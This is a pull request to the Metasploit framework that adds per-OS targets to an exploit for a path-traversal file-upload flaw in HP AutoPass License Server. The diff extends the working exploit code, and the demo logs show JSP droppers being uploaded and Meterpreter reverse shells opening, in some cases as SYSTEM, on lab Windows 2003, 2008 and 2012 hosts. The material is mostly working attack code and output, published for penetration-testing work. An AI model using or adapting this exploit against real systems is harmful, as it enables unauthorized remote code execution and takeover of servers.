### PR TITLE
HP AutoPass License patch for Windows 2008

### DIFF
--- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb
+++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
@@ -40,7 +40,27 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'        => ARCH_JAVA,
       'Targets'     =>
         [
-          ['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
+          ['Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2008 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 7,
+              'InstallFolder' => '/Program Files/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 10 2014'))
@@ -48,9 +68,14 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5814),
-        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
-        OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
-        OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
+        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass'])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('INSTALL_DEPTH', [false, 'Traversal Depth to reach the HP AutoPass License Server folder']),
+        OptString.new('INSTALL_FOLDER', [false, 'HP AutoPass License Server folder']),
+        OptInt.new('WEBAPPS_DEPTH', [false, 'Traversal Depth to reach the Tomcat webapps folder'])
       ], self.class)
   end
 
@@ -99,7 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
     # In order to execute it, through the AutoPass application we would like to drop it here:
     # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
     dropper_traversal = install_traversal
-    dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
+    dropper_traversal << "#{install_folder}/webapps/autopass/scripts/#{dropper_filename}"
+
     res = upload_file(dropper_traversal, dropper)
 
     register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
@@ -140,11 +166,39 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def webapps_traversal
-    "../" * datastore['WEBAPPS_DEPTH']
+    if datastore['WEBAPPS_DEPTH'] > 0
+      depth = datastore['WEBAPPS_DEPTH']
+    elsif target['WebappsDepth']
+      depth = target['WebappsDepth']
+    else
+      depth = 1
+    end
+
+    "../" * depth
   end
 
   def install_traversal
-    "/.." * datastore['INSTALL_DEPTH']
+    if datastore['INSTALL_DEPTH'] > 0
+      depth = datastore['INSTALL_DEPTH']
+    elsif target['InstallDepth']
+      depth = target['InstallDepth']
+    else
+      depth = 4
+    end
+
+    "/.." * depth
+  end
+
+  def install_folder
+    if !datastore['INSTALL_FOLDER'].blank?
+      folder = datastore['INSTALL_FOLDER']
+    elsif target['InstallFolder']
+      folder = target['InstallFolder']
+    else
+      folder = "/HP AutoPass License Server/HP AutoPass License Server"
+    end
+
+    folder
   end
 
   # Using a JSP dropper because the vulnerability doesn't allow to upload

--- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb
+++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -47,12 +47,19 @@ class Metasploit3 < Msf::Exploit::Remote
               'WebappsDepth' => 1
             }
           ],
-          ['Windows 2008 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+          ['Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
             {
               'InstallDepth' => 7,
               'InstallFolder' => '/Program Files/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
               'WebappsDepth' => 1
             }
+          ],
+          ['Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+           {
+               'InstallDepth' => 7,
+               'InstallFolder' => '/Program Files (x86)/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+               'WebappsDepth' => 1
+           }
           ],
           ['Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
             {


### PR DESCRIPTION
On Windows 2008 HP AutoPass License uses a different folder for `data` and `program`. The first installs under `c:\ProgramData` while the second installs under `c:\Program Files`. It makes the traversal less reliable on Windows 2008. On Windows 2003 and 2012, `data` and `program` are installed under the same folder by default.

This pull request adds per-target information (Win 2003, 2008 and 2012) also allowing the user to define his own exploitation parameter as advanced options.
## Verification
- [x]  Install Win 2003, 2008 and/or 2012 (32 or 64 bits). 
- [x] Install HP Autopass License (see #3471) with a default install.
- [x] use the exploit, set the correct target, exploit, verify you get a session.
## DEMO
- Win 2003 SP2 (32 bits)

```
msf exploit(handler) > use exploit/windows/http/hp_autopass_license_traversal
msf exploit(hp_autopass_license_traversal) > set rhost 172.16.158.214
rhost => 172.16.158.214
msf exploit(hp_autopass_license_traversal) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50
   1   Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50
   2   Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50
   3   Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50

msf exploit(hp_autopass_license_traversal) > set target 0
target => 0

msf exploit(hp_autopass_license_traversal) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.214:5814 - Uploading the JSP dropper FNCsRdoM.jsp...
[*] 172.16.158.214:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.214:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.214:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.214:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.214:5814 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.214
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.214:1055) at 2014-07-15 14:59:02 -0500
[+] Deleted ../webapps/autopass/scripts/FNCsRdoM.jsp
[+] Deleted ../webapps/gH1s9ZXRPl6YpMT0ZEmfQ64Chwz0q.war

meterpreter > getuid
sServer username: SYSTEM
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.214 - Meterpreter session 3 closed.  Reason: User exit
```
- Win 2008 32 bits

```
msf exploit(hp_autopass_license_traversal) > set rhost 172.16.158.213
rhost => 172.16.158.213
msf exploit(hp_autopass_license_traversal) > set target 1
target => 1
msf exploit(hp_autopass_license_traversal) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.213:5814 - Uploading the JSP dropper CunnvgKV.jsp...
[*] 172.16.158.213:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.213:5814 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.213
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.213:49206) at 2014-07-15 15:00:44 -0500
[+] Deleted ../webapps/autopass/scripts/CunnvgKV.jsp
[+] Deleted ../webapps/N7GfDkOKu2a3JZM7n.war

meterpreter > getuid
sServer username: WIN-VL02TN0XP8L$
meterpreter > sysinfo
Computer    : WIN-VL02TN0XP8L
OS          : Windows Server 2008 6.0 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.213 - Meterpreter session 4 closed.  Reason: User exit
```
- Win 2008 (64 bits)

```
msf exploit(hp_autopass_license_traversal) > set target 2
target => 2
msf exploit(hp_autopass_license_traversal) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.215:5814 - Uploading the JSP dropper kxDFteul.jsp...
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.158.215:5814).
msf exploit(hp_autopass_license_traversal) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.215:5814 - Uploading the JSP dropper QqIKhqMy.jsp...
[*] 172.16.158.215:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.215:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.215:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.215:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.215:5814 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.215
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.215:49185) at 2014-07-15 15:20:46 -0500
[+] Deleted ../webapps/autopass/scripts/QqIKhqMy.jsp
[+] Deleted ../webapps/pJIn8B7WQ3KKPOKpAZlNkbPR.war

meterpreter > getuid
Server username: WIN-P1AFKVSHNBB$
meterpreter > sysinfo
Computer    : WIN-P1AFKVSHNBB
OS          : Windows Server 2008 R2 6.1 (x86)
Meterpreter : java/java
meterpreter > pwd
C:\Program Files (x86)\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.215 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(hp_autopass_license_traversal) >
```
- Win 2012 (64 bits)

```
msf exploit(hp_autopass_license_traversal) > set target 3
target => 3
msf exploit(hp_autopass_license_traversal) > set rhost 172.16.158.216
rhost => 172.16.158.216
msf exploit(hp_autopass_license_traversal) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.216:5814 - Uploading the JSP dropper WpqtZBeO.jsp...
[*] 172.16.158.216:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.216:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.216:5814 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.216:5814 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.216
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.216:49186) at 2014-07-15 17:44:56 -0500
[+] Deleted ../webapps/autopass/scripts/WpqtZBeO.jsp
[+] Deleted ../webapps/6BYtWy1ONdMXrA9PLL.war

meterpreter > getuid
Server username: WIN-2G90B0HIKTQ$
meterpreter > sysinfo
Computer    : WIN-2G90B0HIKTQ
OS          : Windows NT (unknown) 6.2 (x86)
Meterpreter : java/java
meterpreter > pwd
C:\Program Files (x86)\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 172.16.158.216 - Meterpreter session 2 closed.  Reason: User exit
```
